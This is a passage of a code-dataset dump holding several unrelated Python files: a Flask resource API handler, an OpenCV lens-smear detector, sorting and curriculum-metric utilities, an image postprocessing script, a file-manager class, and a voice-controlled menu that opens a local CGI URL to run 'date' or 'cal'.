'data/meetup_list.csv'\nmeetup_list = 'data/meetup_list2.csv'\n\n","sub_path":"meetup_list_compilation.py","file_name":"meetup_list_compilation.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"177596509","text":"from flask import jsonify\n\nfrom dao.resource import ResourcesDAO\n\n\nclass ResourceHandler:\n def build_resource_dict(self, row):\n result = {}\n result['rid'] = row[0]\n result['sid'] = row[1]\n result['rname'] = row[2]\n result['cost'] = row[3]\n result['resAmount'] = row[4]\n result['buyable'] = row[5]\n result['location'] = row[6]\n\n\n\n return result\n\n def build_supplier_dict(self, row):\n result = {}\n result['sid'] = row[0]\n result['sname'] = row[1]\n result['sphone'] = row[5]\n result['scity'] = row[6]\n\n return result\n\n def build_resource_attributes(self, rid, sid, rname, cost, resv_amount):\n result = {}\n result['rid'] = rid\n result['sid'] = sid\n result['cost'] = rname\n result['rname'] = cost\n result['resv_amount'] = resv_amount\n return result\n\n def getAllResources(self):\n dao = ResourcesDAO()\n resources_list = dao.getAllResources()\n result_list = []\n for row in resources_list:\n result = self.build_resource_dict(row)\n result_list.append(result)\n return jsonify(Resources=result_list)\n\n def getResourceById(self, rid):\n dao = ResourcesDAO()\n row = dao.getResourcesById(rid)\n if not row:\n return jsonify(Error=\"Resource Not Found\"), 404\n else:\n resource = self.build_resource_dict(row)\n return jsonify(Resource=resource)\n\n def searchResources(self, args): #Fixed\n name = args.get(\"name\")\n cost = args.get(\"cost\")\n dao = ResourcesDAO()\n resources_list = []\n if (len(args) == 2) and name and cost:\n resources_list = dao.getResourcesByNameAndCost(name, cost)\n elif (len(args) == 1) and name:\n resources_list = dao.getResourcesByName(name)\n elif (len(args) == 1) and cost:\n resources_list = dao.getResourcesByCost(cost)\n else:\n return jsonify(Error=\"Malformed query string\"), 400\n result_list = []\n for row in resources_list:\n result = self.build_resource_dict(row)\n result_list.append(result)\n return jsonify(Resources=result_list)\n\n def getSuppliersByResourceId(self, rid):\n dao = ResourcesDAO()\n if not dao.getResourceById(rid):\n return jsonify(Error=\"Resource Not Found\"), 404\n suppliers_list = dao.getSuppliersByResourceId(rid)\n result_list = []\n for row in suppliers_list:\n result = self.build_supplier_dict(row)\n result_list.append(result)\n return jsonify(Suppliers=result_list)\n\n def insertResourcesJson(self, form):\n print(\"form: \", form)\n if len(form) != 4:\n return jsonify(Error=\"Malformed post request\"), 400\n else:\n sid = form['sid']\n resv_amount = form['resv_amount']\n cost = form['cost']\n rname = form['rname']\n if rname and resv_amount and cost and sid:\n dao = ResourcesDAO()\n rid = dao.insert(sid, rname, cost, resv_amount)\n result = self.build_resource_attributes(rid, sid, rname, cost, resv_amount)\n return jsonify(Resource=result), 201\n else:\n return jsonify(Error=\"Unexpected attributes in post request\"), 400\n\n def insertResourceBySupplierIdJson(self,rid, json):\n sid = json['sid']\n resv_amount = json['resv_amount']\n cost = json['cost']\n rname = json['rname']\n if rname and resv_amount and cost and sid:\n dao = ResourcesDAO()\n r = dao.insert(rid,sid, rname, cost, resv_amount)\n if r:\n result = self.build_resource_attributes(rid, sid, rname, cost, resv_amount)\n return jsonify(Resource=result), 201\n else:\n return jsonify(Error=\"Resource not found or invalid supplier id.\"), 404\n else:\n return jsonify(Error=\"Unexpected attributes in post request\"), 400\n\n def deleteResource(self, rid):\n dao = ResourcesDAO()\n if not dao.getResourceById(rid):\n return jsonify(Error=\"Resource not found.\"), 404\n else:\n dao.delete(rid)\n return jsonify(DeleteStatus=\"OK\"), 200\n\n def updateResource(self, rid, form):\n dao = ResourcesDAO()\n if not dao.getResourceById(rid):\n return jsonify(Error=\"Resource not found.\"), 404\n else:\n if len(form) != 4:\n return jsonify(Error=\"Malformed update request\"), 400\n else:\n sid = form['sid']\n resv_amount = form['resv_amount']\n cost = form['cost']\n rname = form['rname']\n if rname and resv_amount and cost and sid:\n dao.update(rid, sid, rname, cost, resv_amount)\n result = self.build_resource_attributes(rid, sid, rname, cost, resv_amount)\n return jsonify(Resource=result), 200\n else:\n return jsonify(Error=\"Unexpected attributes in update request\"), 400\n\n def build_resource_counts(self, resource_counts):\n result = []\n # print(resource_counts)\n for P in resource_counts:\n D = {}\n D['id'] = P[0]\n D['name'] = P[1]\n D['count'] = P[2]\n result.append(D)\n return result\n\n def getCountByResourceId(self):\n dao = ResourcesDAO()\n result = dao.getCountByResourceId()\n # print(self.build_resource_counts(result))\n return jsonify(ResourceCounts=self.build_resource_counts(result)), 200\n","sub_path":"handler/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":5812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"49300448","text":"# Program to find smears on camera lens by averaging multiple photo's worth of\n# pixel values and using thresholding techniques in openCV\n\n# Use by going to directory which holds \"sample_drive\" and entering which\n# camera to use. (0-3, 5) as the second argument.\n\nimport sys\nimport numpy as np\nimport cv2\nimport os\n\ndef find_mean_img(file_list):\n # parameter for number of photos to test\n test_size = 301\n\n # create a matrix to store the pixel values after resize\n mean_matrix = np.zeros((1000,1000,3),np.float)\n\n # reseize each image and store pixel value\n print('Processing...')\n image_count = 0;\n while image_count < len(file_list):\n img = cv2.imread(photo_dir_path+file_list[image_count])\n img = cv2.resize(img,(1000,1000))\n img = cv2.GaussianBlur(img,(5,5),0)\n img_matrix = np.array(img, dtype=np.float)\n mean_matrix += img_matrix\n image_count += (len(file_list) / test_size)\n\n # find avg pixel values\n mean_matrix = mean_matrix / (test_size)\n mean_matrix = np.array(np.round(mean_matrix),dtype=np.uint8)\n\n cv2.imwrite('cam_'+str(cam)+\"_mean.jpg\",mean_matrix)\n return mean_matrix\n\ndef create_mask(mean_img):\n # cv2.adaptiveThreshold parameters\n thresh_block_size = 101\n subtracted_constant = 6\n\n # Convert mean image to grayscale\n gray = cv2.cvtColor(mean_img,cv2.COLOR_BGR2GRAY)\n mean_matrix = np.array(np.round(gray),dtype=np.uint8)\n\n # Binarize image with adaptiveThreshold\n mean_thresh = cv2.adaptiveThreshold(mean_matrix,255,\\\n cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY_INV,\\\n thresh_block_size, subtracted_constant)\n\n return mean_thresh\n\ndef show_smudge(mask_img):\n # contour size limits\n min_cnt_area = 500\n max_cnt_area = 3000\n\n # Pull random image\n rand_number = np.random.randint(low=0, high=len(file_list))\n rand_img = cv2.imread(photo_dir_path+file_list[rand_number])\n rand_img = cv2.resize(rand_img,(1000,1000))\n\n # find the contours on the mask and check for appropriate size\n _,contours,hierarchy = cv2.findContours(mask_img, cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\n # print(hierarchy[0])\n cnt_count = 0\n for cnt in contours:\n area = cv2.contourArea(cnt)\n # print(area)\n if area > min_cnt_area and area < max_cnt_area:\n # draw smudge on random image\n rand_img = cv2.drawContours(rand_img,cnt,-1,(0,255,0),3)\n cv2.imwrite('cam_'+str(cam)+\"_found.jpg\",rand_img)\n cnt_count += 1\n if cnt_count == 0:\n print(\"No Smudge Found\")\n else:\n print(\"Found Smudge\")\n\n\nif __name__ == \"__main__\":\n # check for correct number of arguments\n if len(sys.argv) != 2:\n print('Enter which camera to use. (0-3, 5) as second argument.')\n sys.exit()\n cam = int(sys.argv[1])\n if not cam in (0,1,2,3,5):\n print('Enter which camera to use. (0-3, 5) as second argument.')\n sys.exit()\n\n # Make a list of photo names\n photo_dir_path = \"sample_drive/cam_\" + str(cam) + \"/\"\n file_list = os.listdir(photo_dir_path)\n\n mean_image = find_mean_img(file_list)\n mask = create_mask(mean_image)\n cv2.imwrite('cam_'+str(cam)+\"_mask.jpg\",mask)\n show_smudge(mask)\n","sub_path":"smear_detector.py","file_name":"smear_detector.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"88240552","text":"# https://leetcode.com/problems/sort-colors/discuss/\ndef dutch_flag(pivot_index, A):\n\tpivot = A[pivot_index]\n\tsmaller = 0\n\tfor i in range(len(A)):\n\t\tif A[i] < pivot:\n\t\t\tA[i], A[smaller] = A[smaller], A[i]\n\t\t\tsmaller += 1\n\tlarger = len(A) - 1\n\tfor j in reversed(range(len(A))):\n\t\tif A[j] > pivot:\n\t\t\tA[j],A[larger] = A[larger], A[j]\n\t\t\tlarger -=1\n\treturn A\ntest = [3,5,8,4,0,10,1,2,11]\nprint (dutch_flag(3,test))","sub_path":"leetcode/dutch_flag.py","file_name":"dutch_flag.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"254711570","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 2 13:52:28 2020\n\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 23 17:53:02 2020\n\n@author: Rasheed el-Bouri\n\"\"\"\nfrom scipy.stats import wasserstein_distance\nimport numpy as np\nimport pandas as pd\n\n\n\nclass curriculum():\n \n def __init__(self, dataframe):\n self.dataframe = dataframe\n \n def getMahalanobis(self):\n\n dataframe = pd.DataFrame(self.dataframe)\n dataframe = dataframe.reset_index(drop=True)\n nunique = dataframe.apply(pd.Series.nunique)\n if dataframe.shape[1] >= 15:\n cols_to_drop = nunique[nunique <= 2].index\n dataframe = dataframe.drop(cols_to_drop, axis=1) \n \n features = list(dataframe)\n means = pd.DataFrame(np.zeros(len(features)))\n covariance = np.cov(dataframe.T)\n inv_cov = np.linalg.inv(covariance)\n Mahalanobis = np.zeros(len(dataframe))\n \n for j in range(0,len(means)):\n means[0][j] = np.mean(dataframe.iloc[:,j])\n \n means = means.reset_index(drop=True)\n \n for i in range(0,len(dataframe)):\n first = pd.DataFrame(dataframe.iloc[i,:]).reset_index(drop=True) \n \n V = first[i]-means[0]\n Mahalanobis[i] = np.sqrt(np.abs(np.dot(np.dot(V.T,inv_cov), V)))#[0][0]\n \n \n return(pd.DataFrame(Mahalanobis))\n \n \n \n def getCosine(self):\n \n dataframe = self.dataframe.reset_index(drop=True)\n \n features = list(dataframe)\n means = pd.DataFrame(np.zeros(len(features)))\n \n for j in range(0,len(means)):\n means[0][j] = np.mean(dataframe.iloc[:,j])\n \n l=[]\n for i in range(0, len(dataframe)):\n l.append(np.arccos(np.dot(np.array(dataframe[i:i+1]),np.array(means))/(np.linalg.norm(np.array(dataframe[i:i+1]))*np.linalg.norm(np.array(means))))[0])\n \n return(pd.DataFrame(np.array(l)))\n \n \n \n def getWasserstein(self):\n \n dataframe = self.dataframe.reset_index(drop=True)\n \n uniform = (1/dataframe.shape[1])*np.ones(dataframe.shape[1])\n \n l = []\n for i in range(0,len(dataframe)):\n l.append(wasserstein_distance(uniform, np.array(dataframe[i:i+1])[0]))\n \n return(pd.DataFrame(np.array(l)))\n \n \n","sub_path":"curricula/curricula.py","file_name":"curricula.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"364377376","text":"#\n# created by\n# Antonio Garcia-Uceda Juarez\n# PhD student\n# Medical Informatics\n#\n# created on 09/02/2018\n# Last update: 09/02/2018\n########################################################################################\n\nfrom CommonUtil.Constants import *\nfrom CommonUtil.ErrorMessages import *\nfrom CommonUtil.FileReaders import *\nfrom CommonUtil.FunctionsUtil import *\nfrom CommonUtil.PlotsManager import *\nfrom CommonUtil.WorkDirsManager import *\nfrom Networks.Metrics import *\nfrom Preprocessing.OperationsImages import *\nfrom collections import OrderedDict\nimport argparse\n\n\ndef main(args):\n\n # ---------- SETTINGS ----------\n nameInputMasksRelPath = 'ProcMasks'\n nameTracheaMasksRelPath = 'ProcAllMasks'\n\n # Get the file list:\n namePredictionsFiles = 'predict_probmaps*.nii.gz'\n nameInputMasksFiles = '*outerwall.nii.gz'\n nameTracheaMasksFiles = '*_trachea.nii.gz'\n\n # template search files\n tempSearchInputFiles = 'av[0-9]*'\n\n if (args.calcMasksThresholding):\n suffixPostProcessThreshold = '_thres%s'%(str(args.thresholdValue).replace('.','-'))\n if (args.attachTracheaToCalcMasks):\n suffixPostProcessThreshold += '_withtrachea'\n else:\n suffixPostProcessThreshold = ''\n\n # create file to save accuracy measures on test sets\n nameAccuracyPredictFiles = 'predict_accuracy_tests%s.txt'%(suffixPostProcessThreshold)\n\n def update_name_outfile(in_name, in_acc):\n pattern_accval = getExtractSubstringPattern(in_name, 'acc[0-9]*')\n new_accval_int = np.round(100*in_acc)\n out_name = filenamenoextension(in_name).replace('predict_probmaps','predict_binmasks').replace(pattern_accval, 'acc%2.0f'%(new_accval_int))\n return out_name + '%s.nii.gz'%(suffixPostProcessThreshold)\n\n tempOutPredictMasksFilename = update_name_outfile\n # ---------- SETTINGS ----------\n\n\n workDirsManager = WorkDirsManager(args.basedir)\n BaseDataPath = workDirsManager.getNameBaseDataPath()\n InputPredictDataPath = workDirsManager.getNameExistPath(args.basedir, args.predictionsdir)\n InputMasksPath = workDirsManager.getNameExistPath(BaseDataPath, nameInputMasksRelPath)\n OutputPredictMasksPath= workDirsManager.getNameNewPath (args.basedir, args.predictionsdir)\n\n listPredictionsFiles = findFilesDir(InputPredictDataPath, namePredictionsFiles)\n listGrndTruthMasksFiles = findFilesDir(InputMasksPath, nameInputMasksFiles)\n\n nbPredictionsFiles = len(listPredictionsFiles)\n nbGrndTruthMasksFiles = len(listGrndTruthMasksFiles)\n\n # Run checkers\n if (nbPredictionsFiles == 0):\n message = \"0 Predictions found in dir \\'%s\\'\" %(InputPredictDataPath)\n CatchErrorException(message)\n if (nbGrndTruthMasksFiles == 0):\n message = \"0 Ground-truth Masks found in dir \\'%s\\'\" %(InputMasksPath)\n CatchErrorException(message)\n\n\n if (args.calcMasksThresholding and args.attachTracheaToCalcMasks):\n\n TracheaMasksPath = workDirsManager.getNameExistPath(BaseDataPath, nameTracheaMasksRelPath)\n\n listTracheaMasksFiles = findFilesDir(TracheaMasksPath, nameTracheaMasksFiles)\n\n nbTracheaMasksFiles = len(listTracheaMasksFiles)\n\n if (nbGrndTruthMasksFiles != nbTracheaMasksFiles):\n message = \"num Ground-truth Masks %i not equal to num Trachea Masks %i\" %(nbGrndTruthMasksFiles, nbTracheaMasksFiles)\n CatchErrorException(message)\n\n\n computePredictAccuracy = DICTAVAILMETRICFUNS(args.predictAccuracyMetrics, use_in_Keras=False)\n\n listFuns_Metrics = {imetrics: DICTAVAILMETRICFUNS(imetrics, use_in_Keras=False) for imetrics in args.listPostprocessMetrics}\n out_predictAccuracyFilename = joinpathnames(InputPredictDataPath, nameAccuracyPredictFiles)\n fout = open(out_predictAccuracyFilename, 'w')\n\n strheader = '/case/ ' + ' '.join(['/%s/' % (key) for (key, _) in listFuns_Metrics.iteritems()]) + '\\n'\n fout.write(strheader)\n\n\n\n for i, predict_probmaps_file in enumerate(listPredictionsFiles):\n\n print('\\'%s\\'...' %(predict_probmaps_file))\n\n name_prefix_case = getExtractSubstringPattern(basename(predict_probmaps_file),\n tempSearchInputFiles)\n\n for iterfile in listGrndTruthMasksFiles:\n if name_prefix_case in iterfile:\n grndtruth_masks_file = iterfile\n #endfor\n print(\"assigned to '%s'...\" %(basename(grndtruth_masks_file)))\n\n\n predict_probmaps_array = FileReader.getImageArray(predict_probmaps_file)\n grndtruth_masks_array = FileReader.getImageArray(grndtruth_masks_file)\n\n print(\"Predictions masks array of size: %s...\" % (str(predict_probmaps_array.shape)))\n\n\n if (args.calcMasksThresholding):\n print(\"Threshold probability maps to compute binary masks with threshold value %s...\" % (args.thresholdValue))\n\n predict_masks_array = ThresholdImages.compute(predict_probmaps_array, args.thresholdValue)\n\n if (args.attachTracheaToCalcMasks):\n print(\"IMPORTANT: Attach masks of Trachea to computed prediction masks...\")\n\n for iterfile in listTracheaMasksFiles:\n if name_prefix_case in iterfile:\n trachea_masks_file = iterfile\n # endfor\n print(\"assigned to: '%s'...\" % (basename(trachea_masks_file)))\n\n trachea_masks_array = FileReader.getImageArray(trachea_masks_file)\n\n predict_masks_array = OperationsBinaryMasks.join_two_binmasks_one_image(predict_masks_array, trachea_masks_array)\n grndtruth_masks_array = OperationsBinaryMasks.join_two_binmasks_one_image(grndtruth_masks_array, trachea_masks_array)\n\n\n\n accuracy = computePredictAccuracy(grndtruth_masks_array, predict_masks_array)\n\n list_predictAccuracy = OrderedDict()\n\n for (key, value) in listFuns_Metrics.iteritems():\n acc_value = value(grndtruth_masks_array, predict_masks_array)\n list_predictAccuracy[key] = acc_value\n # endfor\n\n\n # print list accuracies on screen\n for (key, value) in list_predictAccuracy.iteritems():\n print(\"Computed '%s': %s...\" %(key, value))\n #endfor\n\n # print list accuracies in file\n strdata = '\\'%s\\''%(name_prefix_case) + ' ' + ' '.join([str(value) for (_,value) in list_predictAccuracy.iteritems()]) +'\\n'\n fout.write(strdata)\n\n\n # Save thresholded final prediction masks\n if (args.calcMasksThresholding and args.saveThresholdImages):\n print(\"Saving prediction thresholded binary masks, with dims: %s...\" %(tuple2str(predict_masks_array.shape)))\n\n out_predictMasksFilename = joinpathnames(OutputPredictMasksPath, tempOutPredictMasksFilename(predict_probmaps_file, accuracy))\n\n FileReader.writeImageArray(out_predictMasksFilename, predict_masks_array)\n #endfor\n\n #close list accuracies file\n fout.close()\n\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--basedir', default=BASEDIR)\n parser.add_argument('--predictionsdir', default='Predictions_NEW')\n parser.add_argument('--predictAccuracyMetrics', default=PREDICTACCURACYMETRICS)\n parser.add_argument('--listPostprocessMetrics', type=parseListarg, default=LISTPOSTPROCESSMETRICS)\n parser.add_argument('--calcMasksThresholding', type=str2bool, default=CALCMASKSTHRESHOLDING)\n parser.add_argument('--thresholdValue', type=float, default=THRESHOLDVALUE)\n parser.add_argument('--attachTracheaToCalcMasks', type=str2bool, default=ATTACHTRAQUEATOCALCMASKS)\n parser.add_argument('--saveThresholdImages', type=str2bool, default=SAVETHRESHOLDIMAGES)\n args = parser.parse_args()\n\n print(\"Print input arguments...\")\n for key, value in vars(args).iteritems():\n print(\"\\'%s\\' = %s\" %(key, value))\n\n main(args)","sub_path":"PostprocessImagesData.py","file_name":"PostprocessImagesData.py","file_ext":"py","file_size_in_byte":7938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"307077495","text":"import Utils\nimport os, os.path\nimport shutil\nimport functools\nimport stat\nimport re\n\ndef report_progress(app, filename, copied, total):\n app.UI.msg(\"%s %s/%s %.2f%%\" % (filename, Utils.csize(copied),\n Utils.csize(total), (copied/total)*100), delay = 0)\n\ndef report_progress_and_copy(app):\n def copy_function(src, dst):\n Utils.copyfile(src, dst, functools.partial(report_progress, app, dst))\n return copy_function\n\nclass Dentry:\n def isdir(self):\n return self.dirp\n\n def csize(self):\n return Utils.csize(self.size)\n\n def __init__(self, d, name):\n self.dir = d\n self.name = name\n try:\n self.dirp = Utils.isdir(Utils.npath(self.dir.path(), self.name))\n self.size = os.stat(self.path()).st_size\n except FileNotFoundError:\n self.dirp = False\n self.size = 0\n\n def __str__(self):\n return self.name\n\n def cname(self):\n return Utils.printable(str(self))\n\n def __eq__(self, other):\n return self.name == other.name and self.dir == other.dir\n\n def path(self):\n return Utils.npath(self.dir.path(), self.name)\n\nclass Dir:\n def gettab(self):\n return self.tab\n\n def getapp(self):\n return self.tab.getapp()\n\n def sel(self):\n fs = self.__num_to_files(self.selected)\n qf = [self.getapp().config[\"shell_quote\"] + f + self.getapp().config[\"shell_quote\"] for f in fs]\n return self.getapp().config[\"filesep\"].join(qf)\n\n def curf(self):\n if self.dents:\n return self.getapp().config[\"shell_quote\"] + self.dents[self.cur].path() + self.getapp().config[\"shell_quote\"]\n else:\n return ''\n\n def create(tab, path = ''):\n\n if path == '': # Must return a Dir object\n if os.path.exists(os.environ[\"HOME\"]):\n d = Dir(tab, os.environ[\"HOME\"])\n else:\n d = Dir(tab, \"/\")\n return d\n\n if not os.path.exists(path):\n return None\n d = Dir(tab, path)\n return d\n\n def __init__(self, tab, path):\n self.tab = tab\n self.root = Utils.rpath(path)\n self.dents = []\n for f in Utils.listdir(path, self.getapp().config[\"show_hidden\"]):\n self.dents.append(Dentry(self, f))\n self.dents = sorted(self.dents, key = self.getapp().config[\"sortkey\"])\n self.n = len(self.dents)\n self.cur = min(0, self.n - 1)\n self.selected = set([])\n self.search_pat = ''\n self.search_results = []\n self.search_cur = 0\n self.pad = None\n\n def dentry(self):\n return self.dents[self.cur]\n \n def __is_selected(self, n):\n return n in self.selected\n\n def __open_files(self, lof):\n for f in lof:\n pass\n\n # WARNING: A reload operation destroys the following\n # 1) The list of selected files in the directory.\n # 2) The current 'search' status in the directory.\n def reload(self):\n # Reload list of files from disk\n self.dents = []\n for f in Utils.listdir(self.root, self.getapp().config[\"show_hidden\"]):\n self.dents.append(Dentry(self, f))\n self.dents = sorted(self.dents, key = self.getapp().config[\"sortkey\"])\n self.n = len(self.dents)\n if self.n == 0: self.cur = -1\n else: self.cur = max(min(self.cur, self.n - 1), 0) # Keep cursor as close as possible.\n self.selected = set([]) # TODO: Preserve selected files\n self.search_pat = '' # TODO: Reload search data\n self.search_cur = 0\n self.search_results = []\n self.winexit()\n self.wininit()\n \n ## Motion commands\n\n def next(self, count = 1):\n oldcur = self.cur\n self.cur = (self.cur + count) % self.n\n self.update([self.cur, oldcur])\n\n def prev(self, count = 1):\n oldcur = self.cur\n self.cur = (self.cur - count) % self.n\n self.update([self.cur, oldcur])\n\n def goto_line(self, lineno = 0):\n oldcur = self.cur\n self.cur = (lineno - 1) % self.n\n self.update([self.cur, oldcur])\n\n def search(self, pat):\n if self.getapp().config[\"search_case_insensitive\"]:\n re_flags = re.I\n else:\n re_flags = 0\n res = []\n for i, s in enumerate(map(lambda x: x.cname(), self.dents)):\n if re.search(pat, s, re_flags):\n res.append(i)\n self.search_pat = pat\n old_search = self.search_results\n self.search_results = res\n self.search_cur = 0\n oldcur = self.cur\n if self.search_results:\n self.cur = self.search_results[self.search_cur]\n self.update([self.cur, oldcur] + self.search_results + old_search)\n\n def search_next(self, count = 1):\n if self.search_results:\n oldcur = self.cur\n self.search_cur = (self.search_cur + count) % len(self.search_results)\n self.cur = self.search_results[self.search_cur]\n self.update([self.cur, oldcur])\n\n def search_prev(self, count = 1):\n if self.search_results:\n oldcur = self.cur\n self.search_cur = (self.search_cur - count) % len(self.search_results)\n self.cur = self.search_results[self.search_cur]\n self.update([self.cur, oldcur])\n\n ## Operator commands\n\n def __get_motion_range(self, motion):\n start = self.cur\n motion()\n end = self.cur\n return range(min(start, end), max(start, end) + 1)\n\n def select(self, motion = None, search = False):\n if motion:\n new = self.__get_motion_range(motion)\n self.selected = self.selected.union(new)\n elif search:\n new = self.search_results\n self.selected = self.selected.union(new)\n self.update(new)\n\n def deselect(self, motion = None, search = False):\n if motion:\n new = self.__get_motion_range(motion)\n self.selected = self.selected.difference(new)\n elif search:\n new = self.search_results\n self.selected = self.selected.difference(new)\n self.update(new)\n\n def __num_to_files(self, lon):\n return [self.dents[i].path() for i in lon]\n\n def yank(self, motion = None, reg = '0', select = None, search = False):\n if select:\n self.getapp().Registers[reg] = self.__num_to_files(self.selected)\n elif motion:\n self.getapp().Registers[reg] = self.__num_to_files(self.__get_motion_range(motion))\n elif search:\n self.getapp().Registers[reg] = self.__num_to_files(self.search_results)\n\n def append(self, motion = None, reg = '0', select = False, search = False):\n if select:\n self.getapp().Registers[reg].extend(self.__num_to_files(self.selected))\n elif motion:\n self.getapp().Registers[reg].extend(self.__num_to_files(self.__get_motion_range(motion)))\n elif search:\n self.getapp().Registers[reg].extend(self.__num_to_files(self.search_results))\n\n # Put files\n def put(self, reg = '0'):\n for path in self.getapp().Registers[reg]:\n dst = self.path() + os.sep + os.path.basename(path)\n if os.path.isdir(path):\n shutil.copytree(path, dst, copy_function = report_progress_and_copy(self.getapp()))\n else:\n copy_func = report_progress_and_copy(self.getapp())\n copy_func(path, dst)\n self.reload()\n\n def open_terminal(self):\n cur_save = os.path.abspath(os.curdir)\n os.chdir(self.path())\n Utils.spawn(self.getapp().config[\"terminal\"],\n [self.getapp().config[\"terminal\"]] + self.getapp().config[\"terminal_args\"])\n os.chdir(cur_save)\n\n # Delete files\n def delete(self, motion = None, select = False, reg = None, search = False):\n if motion:\n Utils.delete_files(self.__num_to_files(self.__get_motion_range(motion)))\n elif select:\n Utils.delete_files(self.__num_to_files(self.selected))\n elif reg:\n Utils.delete_files(self.getapp().Registers[reg])\n elif search:\n Utils.delete_files(self.__num_to_files(self.search_results))\n self.reload()\n\n def view(self, motion = None, select = False, reg = None, search = False):\n if motion:\n Utils.view_files(self.__num_to_files(self.__get_motion_range(motion)))\n elif select:\n Utils.view_files(self.__num_to_files(self.selected))\n elif search:\n Utils.view_files(self.__num_to_files(self.search_results))\n elif reg:\n Utils.view_files(self.getapp().Registers[reg])\n\n def new_dir(self, name):\n os.makedirs(name)\n self.reload()\n\n def path(self):\n return self.root\n\n def exists(self):\n return os.path.exists(self.root)\n\n def cname(self):\n return os.path.basename(self.root)\n\n def update(self, lines):\n self.getapp().UI.dirupdate(self, lines)\n \n def wininit(self):\n self.getapp().UI.dirinit(self)\n self.update(range(0, self.n))\n\n def winexit(self):\n self.getapp().UI.direxit(self)\n","sub_path":"Dir.py","file_name":"Dir.py","file_ext":"py","file_size_in_byte":9256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"560307278","text":"#from django.contrib.sessions.middleware import SessionMiddleware\n\nfrom django.conf import settings\nfrom calc.models import Result\n\n\ndef cutter_context(request):\n context_data = dict()\n context_data['results_count'] = request.results_count = int(\n Result.objects.all().count() + settings.CUTTER_FAKE_RESULTS_NUMBER)\n return context_data\n","sub_path":"cutter/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"450250028","text":"import webbrowser\nimport speech_recognition as sr\nimport pyttsx3\nprint(\"welcome to my tools\\n\\n\")\npyttsx3.speak(\"welcome to my tools\")\n\nwhile 1 :\n\tprint(\"Enter your requirements.......we r listening.....\", end='')\t\n\tpyttsx3.speak(\"Enter your requirements.......we r listening.....\")\n\t#ch=input()\n\tr = sr.Recognizer()\n\twith sr.Microphone() as source :\n \t\tprint('start saying......')\n \t\tpyttsx3.speak('start saying......')\n \t\taudio =r.listen(source)\n \t\tprint('we got it,plz wait.....')\n \t\tpyttsx3.speak('we got it,plz wait.....')\n\tch=r.recognize_google(audio)\n\tif ('date'in ch)and ('run' in ch) or ('execute' in ch): \n\t\tpyttsx3.speak(\"Running the date command\")\t\t\t\n\t\twebbrowser.open(\"http://192.168.43.229/cgi-bin/iiec.py?x=date&p=\") \n\t\tinput()\n\telif ('calender' in ch) and ('run' in ch)or ('execute' in ch): \n\t\tpyttsx3.speak('Running the cal command')\n\t\twebbrowser.open(\"http://192.168.43.229/cgi-bin/iiec.py?x=cal&p=\")\n\t\tinput() \n\telif('exit' in ch):\n\t\tpyttsx3.speak('Exiting')\n\t\tbreak\n \n\telse:\n\t\tprint(\"not uderstand\")\n\t\tpyttsx3.speak('not understand')\n\t\tinput()\n","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"271972742","text":"from matplotlib import pyplot\n\nnunique_days = df.groupby(['code', 'hour']).nunique()['date'].reset_index()\nnunique_days = nunique_days.pivot(index='code', columns='hour', values='date')\n\npyplot.figure(\n figsize=(15, 15))\n\nsns.heatmap(\n data=nunique_days, \n linewidths=.2, \n xticklabels=True, \n yticklabels=True,\n annot=True)\n","sub_path":"visualization/heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"551561716","text":"import ast\r\nfrom zellegraphics import *\r\nimport json\r\nimport pyaudio\r\nfrom rev_ai.models import MediaConfig\r\nfrom rev_ai.streamingclient import RevAiStreamingClient\r\nfrom six.moves import queue\r\nfrom ibm_watson import ToneAnalyzerV3\r\nimport numpy as np\r\nimport threading\r\nfrom threading import Thread\r\nimport time\r\n\r\n\r\n#setting up initial figure\r\nfig_list = []\r\nfig = GraphWin(\"test\",1000,1000)\r\nmood_dict = {}\r\nfull_words = ''\r\n\r\n\r\ndef set_header():\r\n r1 = Rectangle(Point(2,0), Point(22,20))\r\n r1.setFill('red')\r\n r1.draw(fig)\r\n \r\n t0 = Text(Point(500,800),full_words)\r\n t0.setSize(12)\r\n t0.draw(fig)\r\n \r\n t1 = Text(Point(50,12),\"Anger\")\r\n t1.draw(fig)\r\n \r\n r2 = Rectangle(Point(2,25), Point(22,45))\r\n r2.setFill('yellow')\r\n r2.draw(fig)\r\n \r\n t2 = Text(Point(40,37),\"Joy\")\r\n t2.draw(fig)\r\n \r\n r3 = Rectangle(Point(2,50), Point(22,70))\r\n r3.setFill('blue')\r\n r3.draw(fig)\r\n \r\n t3 = Text(Point(60,62),\"Sadness\")\r\n t3.draw(fig)\r\n \r\n r4 = Rectangle(Point(2,75), Point(22,95))\r\n r4.setFill('green')\r\n r4.draw(fig)\r\n \r\n t5 = Text(Point(60,87),\"Confident\")\r\n t5.draw(fig)\r\n \r\n r5 = Rectangle(Point(112,0), Point(132,20))\r\n r5.setFill('black')\r\n r5.draw(fig)\r\n 